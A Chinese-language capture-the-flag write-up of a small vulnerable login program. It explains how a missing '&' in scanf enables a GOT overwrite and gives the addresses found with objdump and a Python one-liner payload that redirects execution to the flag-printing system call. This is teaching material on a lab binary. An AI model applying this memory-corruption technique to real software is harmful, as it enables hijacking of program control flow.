这题主要是的难点是GOT覆写技术的运用。这里推荐几篇文章有关栈溢出和GOT表和PLT表知识的文章。
话不多说,先看正题。
#include <stdio.h>
#include <stdlib.h>
void login(){
int passcode1;
int passcode2;
printf("enter passcode1 : ");
scanf("%d", passcode1);
fflush(stdin);
// ha! mommy told me that 32bit is vulnerable to bruteforcing :)
printf("enter passcode2 : ");
scanf("%d", passcode2);
printf("checking...\n");
if(passcode1==338150 && passcode2==13371337){
printf("Login OK!\n");
system("/bin/cat flag");
}
else{
printf("Login Failed!\n");
exit(0);
}
}
void welcome(){
char name[100];
printf("enter you name : ");
scanf("%100s", name);
printf("Welcome %s!\n", name);
}
int main(){
printf("Toddler's Secure Login System 1.0 beta.\n");
welcome();
login();
// something after login...
printf("Now I can safely trust you that you have credential :)\n");
return 0;
}
通过看这段程序中的login程序段可以发现scanf没有取地址符‘&’,所以这里便为我们创造了覆盖点。
首先使用
readelf -r passcode
获得了system函数的偏移量,之后要做的工作便是寻找name、passcode1、passcode2的位置
运用命令
objdump -d passcode
来查找name、passcode1、passcode2的地址,不难发现,passcode1、passcode2、system的地址都在login函数段中,而name在welcome函数段中,通过对汇编代码的阅读,找到四个目标的地址分别为
passcode1:804857c: 8b 55 f0 mov -0x10(%ebp),%edx
passcode2:80485aa: 8b 55 f4 mov -0xc(%ebp),%edx
system:80485e3: c7 04 24 af 87 04 08 movl $0x80487af,(%esp)
c7 04 24 af 87 04 08 movl $0x80487af,(%esp)
name:8048643: 8d 55 90 lea -0x70(%ebp),%edx
之后计算得到name和passcode1地址的差值为96(十进制),system的地址为134514147(十进制),之后直接运用python运行覆盖
python -c "print 'A'*96+'\x00\xa0\x04\x08'+'134514147\n'" | ./passcode
即可获得flag。
对python脚本的解析,其中‘A'*96代表的意思是覆盖的长度为96;'\x00\xa0\x04\x08\n'相当于py文件脚本中的p32(print),只不过这里直接输出了转化之后的值;'134514147\n'代表的是system的地址,这样就直接使得程序运行之后直接输出flag。
ok,大功告成!